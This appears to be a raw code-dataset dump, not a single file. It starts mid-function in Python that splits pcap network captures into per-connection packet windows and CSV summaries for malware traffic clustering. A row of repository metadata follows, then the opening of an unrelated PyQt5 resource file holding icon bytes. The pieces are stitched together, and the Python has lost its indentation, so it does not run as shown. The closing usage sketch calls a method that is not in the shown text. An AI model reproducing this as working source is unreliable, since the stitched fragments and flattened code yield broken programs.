if amount_packets >= window_size:
amount_windows = (math.floor(amount_packets / window_size))
amount_packets = amount_windows * window_size
window_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = amount_windows
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for index, packet in enumerate(packets_value):
if index < amount_packets:
pktdump.write(packet)
else:
break
pktdump.close()
print("Create csv file")
csv_df = pd.read_csv(path_to_csv_file)
csv_df["src_ip"] = csv_df["src_ip"].apply(lambda x: str(x).strip())
csv_df["dst_ip"] = csv_df["dst_ip"].apply(lambda x: str(x).strip())
csv_df["src_port"] = csv_df["src_port"].apply(lambda x: str(x).strip())
csv_df["dst_port"] = csv_df["dst_port"].apply(lambda x: str(x).strip())
csv_df["ip_protocol"] = csv_df["ip_protocol"].apply(lambda x: str(x).strip())
csv_df["src_ip"] = csv_df["src_ip"].astype(str)
csv_df["dst_ip"] = csv_df["dst_ip"].astype(str)
csv_df["src_port"] = csv_df["src_port"].astype(str)
csv_df["dst_port"] = csv_df["dst_port"].astype(str)
csv_df["ip_protocol"] = csv_df["ip_protocol"].astype(str)
if len(window_dic) > 0:
row_list = []
for index, (address, amount_windows) in enumerate(window_dic.items()):
# address = (src_ip, dst_ip, ip_protocol, src_port, dst_port)
src_ip = str(address[0]).strip()
dst_ip = str(address[1]).strip()
ip_protocol = str(address[2]).strip()
src_port = str(address[3]).strip()
dst_port = str(address[4]).strip()
row = csv_df[(csv_df["src_ip"] == src_ip) & (csv_df["dst_ip"] == dst_ip) &
(csv_df["ip_protocol"] == ip_protocol) & (csv_df["src_port"] == src_port) & (
csv_df["dst_port"] == dst_port)]
for window_index in range(0, amount_windows):
new_row = row.copy()
new_row["connection_length"] = window_size
new_row["window"] = window_index
row_list.append(new_row)
combined_df = pd.concat(row_list)
file_packet_dic.clear()
window_dic.clear()
new_csv_file_path = new_folder_path + "/" + scenario_name + "_" + file_name + "_summary.csv"
combined_df = combined_df.sort_values(by=["src_ip", "dst_ip", "ip_protocol", "src_port", "dst_port", "window"], ascending=True)
combined_df.to_csv(new_csv_file_path, index=False)
@staticmethod
def split_connection_into_X_equal_parts_for_malpaca(threshold, parts, folder_to_filtered_files, folder_to_move_data_to, old_file_addition):
folder_to_filtered_files = folder_to_filtered_files
folder_to_move_data_to = folder_to_move_data_to
threshold = int(threshold)
parts = int(parts)
new_folder_name = folder_to_move_data_to + "/" + str(threshold) + "_threshold_" + str(parts) + "_parts"
os.mkdir(new_folder_name)
for piece in range(1, (parts + 1)):
new_folder = new_folder_name + "/" + str(threshold) + "_threshold_" + str(piece) + "_part"
os.mkdir(new_folder)
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
print("Create pcap file")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + old_file_addition + ".pcap"
parts_list = []
for part in range(parts):
parts_list.append([])
file_packet_dic = {}
connections_used = []
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int):
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
if (src_ip, dst_ip, ip_protocol, src_port, dst_port) not in file_packet_dic:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)] = [packet]
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port)].append(packet)
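# The slicing below spreads the X parts evenly across the connection: with
# len_connection = 1000, threshold = 100 and parts = 3, remainder = 700,
# to_skip_packets = 350 and one_move = 450, so the parts are packets
# [0:100], [450:550] and the trailing packets_value[-100:]. Note that the
# computation divides by (parts - 1), so it assumes parts >= 2 and a
# connection at least threshold * parts packets long.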
for address, packets_value in file_packet_dic.items():
len_connection = len(packets_value)
if len_connection >= (threshold * parts):
connections_used.append(address)
remainder = len_connection - (threshold * parts)
to_skip_packets = math.floor((remainder / (parts - 1)))
one_move = threshold + to_skip_packets
one_to_last_packet = one_move * (parts - 1)
index = 0
for start_value in range(0, one_to_last_packet, one_move):
packet_slice = packets_value[start_value:(start_value + threshold)]
parts_list[index].append(packet_slice)
index = index + 1
parts_list[index].append(packets_value[-threshold:])
summary_df = pd.read_csv(path_to_csv_file)
if len(connections_used) > 0:
for connection_index, (src_ip, dst_ip, ip_protocol, src_port, dst_port) in enumerate(connections_used):
src_ip = str(src_ip).strip()
dst_ip = str(dst_ip).strip()
ip_protocol = str(ip_protocol).strip()
src_port = str(src_port).strip()
dst_port = str(dst_port).strip()
one_file_df = summary_df[(summary_df["src_ip"] == src_ip) & (summary_df["dst_ip"] == dst_ip) & (summary_df["ip_protocol"] == ip_protocol) & (summary_df["src_port"] == src_port) & (summary_df["dst_port"] == dst_port)]
one_file_df["connection_length"] = threshold
if connection_index == 0:
combined_df = one_file_df
else:
combined_df = combined_df.append(one_file_df)
for part_index, part in enumerate(parts_list):
new_file_path = folder_to_move_data_to + "/" + str(threshold) + "_threshold_" + str(parts) + "_parts/" + str(threshold) + "_threshold_" + str(part_index + 1) + "_part/" + scenario_name + "_" + file_name
csv_summary_path = folder_to_move_data_to + "/" + str(threshold) + "_threshold_" + str(parts) + "_parts/" + str(threshold) + "_threshold_" + str(part_index + 1) + "_part/" + scenario_name + "_" + file_name + "_summary.csv"
pktdump = PcapWriter(new_file_path, append=True, sync=True)
for packet in part:
pktdump.write(packet)
pktdump.close()
combined_df.to_csv(csv_summary_path, index=False)
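# A minimal usage sketch (the paths and the 'filtered' suffix below are
# assumptions for illustration, not values from this repository):
if __name__ == '__main__':
    For_Malpaca_Preparation_Netflow.get_data_equal_to_fixed_threshold_for_malpaca_enriched(
        threshold=20,
        folder_to_filtered_files='/data/filtered',
        folder_to_move_data_to='/data/malpaca_input',
        old_file_addition='filtered')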
| 48.612512 | 242 | 0.498022 | 5,683 | 52,064 | 4.207109 | 0.034313 | 0.054582 | 0.029905 | 0.015475 | 0.915806 | 0.906981 | 0.902464 | 0.900247 | 0.897068 | 0.89368 | 0 | 0.005024 | 0.395974 | 52,064 | 1,070 | 243 | 48.657944 | 0.755247 | 0.001056 | 0 | 0.878427 | 0 | 0 | 0.057607 | 0.000481 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007151 | false | 0 | 0.028605 | 0 | 0.036949 | 0.060787 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7e10a5950fa6140f2ecbefd55a2cae251838ed39 | 19215 | py | Python | include/resources.py | Resavin/NotationCalculator | d4d8d52ac6f25befe5d529d181ab47d4235e37c7 | ["MIT"] | null | null | null | include/resources.py | Resavin/NotationCalculator | d4d8d52ac6f25befe5d529d181ab47d4235e37c7 | ["MIT"] | 2 | 2021-12-22T21:17:45.000Z | 2021-12-22T22:28:55.000Z | include/resources.py | Resavin/NotationCalculator | d4d8d52ac6f25befe5d529d181ab47d4235e37c7 | ["MIT"] | 2 | 2021-12-22T21:08:21.000Z | 2021-12-22T21:16:57.000Z |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
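# The byte string below is the compiled resource payload; its leading bytes
# (00 00 01 00 01 00 20 20 ...) are a Windows .ico header, i.e. a single
# 32x32, 32-bit icon image.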
qt_resource_data = b"\
\x00\x00\x10\xbe\
\x00\
\x00\x01\x00\x01\x00\x20\x20\x00\x00\x01\x00\x20\x00\xa8\x10\x00\
\x00\x16\x00\x00\x00\x28\x00\x00\x00\x20\x00\x00\x00\x40\x00\x00\
\x00\x01\x00\x20\x00\x00\x00\x00\x00\x80\x10\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\
\x11\x09\x09\x09\x1a\x06\x06\x06\x26\x1f\x1f\x1f\x30\x1b\x1b\x1b\
\x2e\x07\x07\x07\x23\x0a\x0a\x0a\x19\x00\x00\x00\x10\x00\x00\x00\
\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x02\x00\x00\x00\x11\x39\x39\x39\x35\xa6\xa6\xa6\x81\xcf\xcf\xcf\
\xbc\xe2\xe2\xe2\xe5\xf0\xf0\xf0\xfa\xf6\xf6\xf6\xff\xf5\xf5\xf5\
\xfe\xee\xee\xee\xf6\xdf\xdf\xdf\xdd\xc9\xc9\xc9\xb0\x92\x92\x92\
\x71\x1f\x1f\x1f\x29\x00\x00\x00\x0e\x00\x00\x00\x02\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0d\x53\x53\x53\
\x40\xc7\xc7\xc7\xaf\xf3\xf3\xf3\xf8\xff\xff\xff\xff\xfc\xfb\xfc\
\xff\xd9\xd1\xd7\xff\xba\xac\xb7\xff\xab\x9a\xa8\xff\xad\x9d\xaa\
\xff\xbf\xb2\xbd\xff\xe3\xdd\xe2\xff\xfe\xfe\xfe\xff\xfe\xfe\xfe\
\xff\xea\xea\xea\xef\xb6\xb6\xb6\x97\x2c\x2c\x2c\x2e\x00\x00\x00\
\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x02\x09\x09\x09\x1b\xaa\xaa\xaa\x8d\xf2\xf2\xf2\
\xf7\xff\xff\xff\xff\xd0\xc6\xce\xff\x79\x5d\x73\xff\x38\x10\x30\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x44\x1e\x3c\xff\x8b\x74\x86\
\xff\xe3\xde\xe2\xff\xff\xff\xff\xff\xe9\xe9\xe9\xe9\x8b\x8b\x8b\
\x6a\x00\x00\x00\x15\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x03\x25\x25\x25\x29\xcd\xcd\xcd\xbf\xfe\xfe\xfe\xff\xe4\xdf\xe3\
\xff\x6a\x4c\x64\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2f\x04\x26\xff\x88\x70\x83\xff\xf4\xf2\xf4\xff\xf9\xf9\xf9\
\xfd\xb0\xb0\xb0\x98\x09\x09\x09\x1b\x00\x00\x00\x02\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x26\x26\x26\
\x28\xd7\xd7\xd7\xcc\xff\xff\xff\xff\xbe\xb1\xbc\xff\x37\x0f\x2f\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x4b\x26\x43\xff\xdd\xd6\xdb\
\xff\xfd\xfd\xfd\xff\xba\xba\xba\xa3\x09\x09\x09\x1a\x00\x00\x00\
\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x0a\x0a\x19\xc9\xc9\xc9\
\xbb\xff\xff\xff\xff\xb2\xa2\xaf\xff\x2d\x03\x24\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x3b\x13\x32\
\xff\xd7\xcf\xd5\xff\xfd\xfd\xfd\xfe\xa8\xa8\xa8\x8a\x00\x00\x00\
\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x0c\xa4\xa4\xa4\x84\xfd\xfd\xfd\
\xff\xc8\xbd\xc5\xff\x2e\x04\x26\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x3f\x18\x37\xff\xe9\xe4\xe8\xff\xf6\xf6\xf6\xfa\x70\x70\x70\
\x54\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x02\x45\x45\x45\x37\xef\xef\xef\xf3\xf0\xed\xef\
\xff\x3f\x18\x37\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x63\x43\x5c\xff\xfe\xfe\xfe\xff\xda\xda\xda\
\xd4\x08\x08\x08\x1f\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x0e\xbe\xbe\xbe\xa2\xff\xff\xff\xff\x85\x6c\x80\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2c\x01\x23\xff\xaf\x9f\xac\xff\x4a\x26\x43\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xb7\xa9\xb4\xff\xfd\xfd\xfd\
\xff\x90\x90\x90\x6f\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\
\x00\x25\x25\x25\x29\xee\xee\xee\xf2\xeb\xe7\xea\xff\x31\x07\x28\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xc9\xbe\xc7\xff\x8c\x74\x87\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x4f\x2c\x48\xff\xfe\xfe\xfe\
\xff\xd6\xd6\xd6\xcb\x09\x09\x09\x1a\x00\x00\x00\x00\x00\x00\x00\
\x05\x93\x93\x93\x70\xfe\xfe\xfe\xff\x9c\x88\x98\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x70\x53\x6a\xff\x68\x49\x61\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x8f\x78\x8a\xff\xc6\xbb\xc4\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xce\xc4\xcc\
\xff\xf7\xf7\xf7\xfc\x3f\x3f\x3f\x3c\x00\x00\x00\x05\x00\x00\x00\
\x0e\xc6\xc6\xc6\xac\xff\xff\xff\xff\x5c\x3b\x55\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xca\xbf\xc7\xff\xb8\xa9\xb5\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x54\x31\x4d\xff\xf8\xf7\xf8\
\xff\x33\x09\x2a\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x8d\x77\x89\
\xff\xff\xff\xff\xff\x9e\x9e\x9e\x79\x00\x00\x00\x0a\x0b\x0b\x0b\
\x16\xdb\xdb\xdb\xd6\xfb\xfa\xfb\xff\x30\x07\x28\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xca\xbf\xc7\xff\xb8\xa9\xb5\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2c\x01\x23\xff\xec\xe9\xec\
\xff\x67\x48\x60\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xa4\x92\xa0\
\xff\xc3\xb7\xc1\xff\xc3\xb7\xc1\xff\xc3\xb7\xc1\xff\xa6\x94\xa2\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x5e\x3e\x57\
\xff\xff\xff\xff\xff\xc2\xc2\xc2\xa4\x00\x00\x00\x11\x08\x08\x08\
\x1d\xe7\xe7\xe7\xef\xe2\xdc\xe1\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x32\x09\x2a\xff\x32\x09\x2a\xff\x32\x09\x2a\
\xff\xcc\xc1\xc9\xff\xba\xac\xb7\xff\x32\x09\x2a\xff\x32\x09\x2a\
\xff\x32\x09\x2a\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xb3\xa4\xb0\
\xff\xa1\x8e\x9d\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xb4\xa4\xb0\
\xff\xd6\xce\xd5\xff\xd6\xce\xd5\xff\xd6\xce\xd5\xff\xb5\xa6\xb2\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x40\x19\x38\
\xff\xff\xff\xff\xff\xd2\xd2\xd2\xbf\x00\x00\x00\x16\x07\x07\x07\
\x24\xef\xef\xef\xf8\xd3\xcb\xd2\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x39\x11\x31\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\
\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\
\xff\xfb\xfb\xfb\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x79\x5d\x73\
\xff\xdc\xd5\xda\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x31\x07\x28\
\xff\xff\xff\xff\xff\xd8\xd8\xd8\xcd\x0a\x0a\x0a\x19\x07\x07\x07\
\x23\xee\xee\xee\xf8\xd4\xcb\xd2\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x30\x06\x27\xff\x7c\x61\x76\xff\x7c\x61\x76\xff\x7c\x61\x76\
\xff\xde\xd7\xdc\xff\xd3\xca\xd1\xff\x7c\x61\x76\xff\x7c\x61\x76\
\xff\x7a\x60\x75\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x3f\x18\x37\
\xff\xfd\xfd\xfd\xff\x42\x1c\x3a\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x32\x08\x29\
\xff\xff\xff\xff\xff\xd8\xd8\xd8\xcc\x00\x00\x00\x18\x08\x08\x08\
\x1d\xe6\xe6\xe6\xee\xe4\xdf\xe3\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xca\xbf\xc7\xff\xb8\xa9\xb5\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xd8\xd0\xd6\xff\x7c\x62\x77\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x42\x1b\x3a\
\xff\xff\xff\xff\xff\xd1\xd1\xd1\xbe\x00\x00\x00\x16\x00\x00\x00\
\x15\xda\xda\xda\xd3\xfc\xfb\xfc\xff\x32\x09\x2a\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xca\xbf\xc7\xff\xb8\xa9\xb5\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x9d\x89\x99\xff\xb7\xa8\xb4\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x61\x41\x5b\
\xff\xff\xff\xff\xff\xc1\xc1\xc1\xa1\x00\x00\x00\x10\x00\x00\x00\
\x0d\xc3\xc3\xc3\xa8\xff\xff\xff\xff\x60\x40\x59\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\xa3\x90\x9f\xff\x95\x80\x91\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x62\x43\x5c\xff\xef\xec\xee\xff\x2d\x02\x24\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x92\x7c\x8d\
\xff\xff\xff\xff\xff\x99\x99\x99\x74\x00\x00\x00\x0a\x00\x00\x00\
\x05\x8d\x8d\x8d\x6a\xfe\xfe\xfe\xff\xa2\x90\x9e\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x31\x07\x28\xff\xf6\xf4\xf6\xff\x57\x36\x50\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xd4\xcb\xd2\
\xff\xf5\xf5\xf5\xfb\x37\x37\x37\x37\x00\x00\x00\x05\x00\x00\x00\
\x00\x1b\x1b\x1b\x25\xe9\xe9\xe9\xef\xef\xec\xef\xff\x34\x0b\x2c\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\xc1\xb5\xbf\xff\x92\x7c\x8d\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x57\x34\x4f\xff\xfe\xfe\xfe\
\xff\xd2\xd2\xd2\xc5\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x0d\xb7\xb7\xb7\x9a\xff\xff\xff\xff\x8f\x78\x8a\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x3e\x16\x35\xff\x41\x1b\x39\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\x2b\x00\x22\
\xff\x2b\x00\x22\xff\x2b\x00\x22\xff\xc0\xb4\xbe\xff\xfd\xfd\xfd\
\xff\x87\x87\x87\x66\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\
